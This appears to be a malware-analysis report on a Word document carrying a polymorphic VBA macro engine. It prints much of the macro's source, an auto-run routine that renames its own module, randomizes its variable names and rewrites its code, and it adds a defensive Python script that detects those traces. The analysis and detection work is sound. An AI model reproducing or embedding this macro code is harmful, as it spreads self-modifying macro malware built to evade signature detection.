Verdict: MALICIOUS
Risk Score: 82

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The recovered VBA source (macros.bas, below) is a self-rewriting polymorphic macro engine rather than a downloader. On each run it locates its own module by the `'KGB`-style name comment on line 2, gives the module a fresh random three-letter name, copies its code lines into the document body, renames its twelve working variables (`TRTM1`, `KSIM1`, ... ) with Find/Replace to new `[A-Y]{3}M1` identifiers, writes the text back with `CodeModule.AddFromString`, and stamps every short line with a new random three-character `'xyz!` comment suffix. The second module, `Gen0`, carries a readable copy of the same routine under its original variable names and describes itself in a comment as "MI_pirat's PolyMorphing Ngine". No URL fetch, shell, or file-drop logic appears in the preview, so the recovered code does not support the assumption that a second-stage payload is downloaded; the auto-execution evidence is the `AutoOpen` heuristic, while the preview's entry point is named `Sub AutoOpen2()` and the engine's own check expects a module beginning `Sub AutoOpen()`. The URL http://www.virii.s5.com/ was found in the document body text, not in the macro, and is rated info; it is listed as an indicator only. Note also that olevba did recover a VBA project for this sample, so the legacy WordBasic heuristic's "no modern VBA project was recovered" wording should be read against the extraction below.
Heuristics (4)
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://www.virii.s5.com/ (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 25664 bytes | 3d87c3979ce3097d39f94b9411f565c95800ef85d4349e982746b0dd8c9e9938 |
Preview of the extracted script (first 1,000 lines, truncated). The preview concatenates three modules (`ThisDocument`, `KGB`, `Gen0`); blank lines below separate them. The odd characters inside the trailing `'xyz!` comments are not extraction damage: the engine builds each suffix from three bytes `Chr(Int((120 * Rnd) + 32))`, i.e. values 32..151, and the bytes above 127 render as cp1252 glyphs (`„`, `‹`, `Ž`, ...) or as `�` where cp1252 has no glyph for that byte.

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "KGB"
Sub AutoOpen2()
'KGB ';`,!
On Error Resume Next 'tyH!
If ThisDocument.Name <> NormalTemplate.Name Then '„7X!
TRTM1 = 12 '�x !
ReDim LUWM1(1 To TRTM1) As String ''*’!
LUWM1(1) = "TRTM1": LUWM1(2) = "KSIM1": LUWM1(3) = "AUUM1" '>e+!
LUWM1(4) = "LUWM1": LUWM1(5) = "MWCM1": LUWM1(6) = "YNCM1": LUWM1(7) = "GSYM1" '^)„!
LUWM1(8) = "PUDM1": LUWM1(9) = "DYRM1": LUWM1(10) = "OUPM1": LUWM1(11) = "GRDM1"
LUWM1(12) = "PDBM1" 'UM’!
KSIM1 = ActiveDocument.Content '%`8!
For GSYM1 = 1 To ActiveDocument.VBProject.VBComponents.Count 'I-‹!
OUPM1 = ActiveDocument.VBProject.VBComponents(GSYM1).CodeModule.Lines(2, 1) ']5H!
PUDM1 = Mid(OUPM1, 1, 1) 'E8`!
DYRM1 = Len(OUPM1) '6?2!
If DYRM1 >= 4 Then GRDM1 = Mid(OUPM1, 2, 3) '\e}!
If (PUDM1 = "'") And (GRDM1 = ActiveDocument.VBProject.VBComponents(GSYM1).Name) Then '`ˆN!
Randomize '„ˆf!
GRDM1 = Chr(Int((25 * Rnd) + 65)) + Chr(Int((25 * Rnd) + 65)) + Chr(Int((25 * Rnd) + 65))
ActiveDocument.VBProject.VBComponents(GSYM1).CodeModule.ReplaceLine 2, "'" + GRDM1
ActiveDocument.VBProject.VBComponents(GSYM1).Name = GRDM1 'pm7!
PDBM1 = GSYM1 'b/O!
End If '‚E>!
Next GSYM1 '+}^!
ActiveDocument.Windows(1).WindowState = wdWindowStateMinimize '0A�!
ActiveDocument.Content = "" '—ŽI!
AUUM1 = ActiveDocument.VBProject.VBComponents(PDBM1).CodeModule.CountOfLines '6:l!
For GSYM1 = 1 To AUUM1 'wo[!
ActiveDocument.Content = ActiveDocument.Content + ActiveDocument.VBProject.VBComponents(PDBM1).CodeModule.Lines(GSYM1, 1)
Next GSYM1 '$VW!
For GSYM1 = 1 To TRTM1 'K„+!
Randomize 'sXJ!
YNCM1 = Chr(Int((25 * Rnd) + 65)) + Chr(Int((25 * Rnd) + 65)) + Chr(Int((25 * Rnd) + 65)) + "M1"
Set MWCM1 = ActiveDocument.Content '@D`!
MWCM1.Find.Execute FindText:=LUWM1(GSYM1), ReplaceWith:=YNCM1, Replace:=wdReplaceAll
Next GSYM1 'z]W!
AUUM1 = ActiveDocument.VBProject.VBComponents(PDBM1).CodeModule.CountOfLines '>q3!
ActiveDocument.VBProject.VBComponents(PDBM1).CodeModule.DeleteLines 1, AUUM1 'I02!
YNCM1 = ActiveDocument.Content 'f~‚!
ActiveDocument.VBProject.VBComponents(PDBM1).CodeModule.AddFromString YNCM1 'A� !
ActiveDocument.Content = "" '‰0b!
ActiveDocument.Content = KSIM1 'm^ˆ!
mm: 'ˆRz!
If ActiveDocument.VBProject.VBComponents(PDBM1).CodeModule.Lines(1, 1) <> "Sub AutoOpen()" Then
ActiveDocument.VBProject.VBComponents(PDBM1).CodeModule.DeleteLines 1, 1 'w|\!
GoTo mm 'kmd!
End If 'F: !
TRTM1 = ActiveDocument.VBProject.VBComponents.Item(PDBM1).CodeModule.CountOfLines
For GSYM1 = 2 To TRTM1 '*6`!
OUPM1 = ActiveDocument.VBProject.VBComponents(PDBM1).CodeModule.Lines(GSYM1, 1) 'q3s!
GRDM1 = Mid(OUPM1, Len(OUPM1)) '&E“!
If (GRDM1 <> "!") And (Len(OUPM1) < 80) Then 'hi+!
PUDM1 = Chr(Int((120 * Rnd) + 32)) + Chr(Int((120 * Rnd) + 32)) + Chr(Int((120 * Rnd) + 32))
YNCM1 = OUPM1 + " '" + PUDM1 + "!" '?MŠ!
ActiveDocument.VBProject.VBComponents.Item(PDBM1).CodeModule.ReplaceLine GSYM1, YNCM1
End If 'r\„!
Next GSYM1 ':†}!
ActiveDocument.VBProject.VBComponents(PDBM1).CodeModule.DeleteLines TRTM1, 1 '”2B!
ActiveDocument.Windows(1).WindowState = wdWindowStateMaximize 'B�‚!
End If '# :!
End Sub 'r?)!

Attribute VB_Name = "Gen0"
Sub PolyNgine()
'Gen0
'MI_pirat's PolyMorphing Ngine
On Error Resume Next
If ThisDocument.Name <> NormalTemplate.Name Then
nr = 12
ReDim suk(1 To nr) As String
suk(1) = "nr": suk(2) = "bkup": suk(3) = "nuk"
suk(4) = "suk": suk(5) = "myRange": suk(6) = "strip": suk(7) = "ik"
suk(8) = "char1": suk(9) = "nur": suk(10) = "nam1": suk(11) = "nam2"
suk(12) = "kewl"
bkup = ActiveDocument.Content
'find and change the module name (100% poly)
For ik = 1 To ActiveDocument.VBProject.VBComponents.Count
nam1 = ActiveDocument.VBProject.VBComponents(ik).CodeModule.Lines(2, 1)
char1 = Mid(nam1, 1, 1)
nur = Len(nam1)
If nur >= 4 Then nam2 = Mid(nam1, 2, 3)
If (char1 = "'") And (nam2 = ActiveDoc ... (truncated)
```
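The polymorphic engine leaves three stable fingerprints in any generation it produces: an auto-execution procedure name, writes to its own VBProject through the VBIDE object model (`CodeModule.ReplaceLine`, `DeleteLines`, `AddFromString`, `VBComponents(...).Name =`), and the random residue of its two generators (`[A-Y]{3}M1` identifiers, because `Int((25 * Rnd) + 65)` only yields 65..89, and `'xyz!` comment suffixes on most lines). The triage script below is an added example, not part of the analyzer or of the sample; it runs those checks over the decoded source olevba emits. The regexes, the verdict thresholds and the abridged excerpt of the `KGB` module used as input (non-ASCII comment bytes replaced with ASCII so the string stays portable) are this author's assumptions.

```python
"""Heuristic triage of VBA source recovered with olevba (e.g. macros.bas).

Flags the three traits visible in this sample's preview:
  1. auto-execution entry points (AutoOpen, AutoOpen2, AutoExec, ...);
  2. VBIDE self-modification calls that rewrite the running VBProject;
  3. polymorphic-engine residue: random "'xyz!" comment suffixes and the
     [A-Y]{3}M1 identifiers produced by Chr(Int((25 * Rnd) + 65)) + "M1".
Added example; regexes and thresholds are this author's assumptions.
"""
import re

# Word's auto macros plus any suffix (the preview shows Sub AutoOpen2()).
AUTOEXEC_RE = re.compile(
    r"^\s*(?:Public\s+|Private\s+)?Sub\s+(Auto(?:Open|Close|Exec|Exit|New)\w*)\s*\(",
    re.IGNORECASE | re.MULTILINE,
)
# The engine appends " '" + three Chr(32..151) bytes + "!" to every line
# shorter than 80 chars that does not already end in "!".
POLY_COMMENT_RE = re.compile(r" '.{3}!\s*$")
# Int((25 * Rnd) + 65) yields 65..89, i.e. 'A'..'Y', three times, then "M1".
POLY_IDENT_RE = re.compile(r"\b[A-Y]{3}M1\b")
# Writes to the VBProject through the VBIDE object model.
SELF_MOD_RE = re.compile(
    r"\.CodeModule\.(?:ReplaceLine|DeleteLines|AddFromString|InsertLines)\b"
    r"|\.VBComponents\([^)]*\)\.Name\s*=",
    re.IGNORECASE,
)


def triage_vba(src: str) -> dict:
    """Return counts and a verdict for one module's decoded VBA source."""
    lines = [ln for ln in src.splitlines() if ln.strip()]
    entry_points = AUTOEXEC_RE.findall(src)
    self_mod_calls = [m.group(0) for m in SELF_MOD_RE.finditer(src)]
    poly_comment_lines = sum(1 for ln in lines if POLY_COMMENT_RE.search(ln))
    poly_idents = sorted(set(POLY_IDENT_RE.findall(src)))
    ratio = poly_comment_lines / len(lines) if lines else 0.0
    # Thresholds are assumptions tuned to this engine: rewriting its own module
    # needs at least a delete plus an add/replace, and the comment stamper hits
    # most lines of the current generation.
    polymorphic = len(self_mod_calls) >= 2 and ratio >= 0.5 and len(poly_idents) >= 3
    return {
        "entry_points": entry_points,
        "self_mod_calls": len(self_mod_calls),
        "poly_comment_lines": poly_comment_lines,
        "poly_comment_ratio": round(ratio, 2),
        "poly_idents": poly_idents,
        "polymorphic_engine": polymorphic,
    }


# Constructed input: abridged excerpt of the KGB module from the preview above,
# with the non-ASCII comment bytes replaced by ASCII characters.
SAMPLE_KGB = """
Attribute VB_Name = "KGB"
Sub AutoOpen2()
'KGB ';`,!
On Error Resume Next 'tyH!
If ThisDocument.Name <> NormalTemplate.Name Then 'q7X!
TRTM1 = 12 'Zx !
ReDim LUWM1(1 To TRTM1) As String ''*Q!
LUWM1(1) = "TRTM1": LUWM1(2) = "KSIM1": LUWM1(3) = "AUUM1" '>e+!
KSIM1 = ActiveDocument.Content '%`8!
For GSYM1 = 1 To ActiveDocument.VBProject.VBComponents.Count 'I-<!
OUPM1 = ActiveDocument.VBProject.VBComponents(GSYM1).CodeModule.Lines(2, 1) ']5H!
Randomize 'abc!
GRDM1 = Chr(Int((25 * Rnd) + 65)) + Chr(Int((25 * Rnd) + 65)) + Chr(Int((25 * Rnd) + 65))
ActiveDocument.VBProject.VBComponents(GSYM1).CodeModule.ReplaceLine 2, "'" + GRDM1
ActiveDocument.VBProject.VBComponents(GSYM1).Name = GRDM1 'pm7!
Next GSYM1 '+}^!
ActiveDocument.VBProject.VBComponents(PDBM1).CodeModule.DeleteLines 1, AUUM1 'I02!
ActiveDocument.VBProject.VBComponents(PDBM1).CodeModule.AddFromString YNCM1 'Az !
End If '# :!
End Sub 'r?)!
"""

if __name__ == "__main__":
    for key, value in triage_vba(SAMPLE_KGB).items():
        print(f"{key}: {value}")
```

Two caveats when running this over real extractions: `AUTOEXEC_RE` deliberately accepts suffixed names such as `AutoOpen2`, which Word does not run by name, so an entry-point hit means "auto-macro naming present", not "executes on open"; and an ordinary comment that happens to end in "!" also satisfies `POLY_COMMENT_RE`, which is why the verdict requires the self-modification calls and several generated identifiers as well.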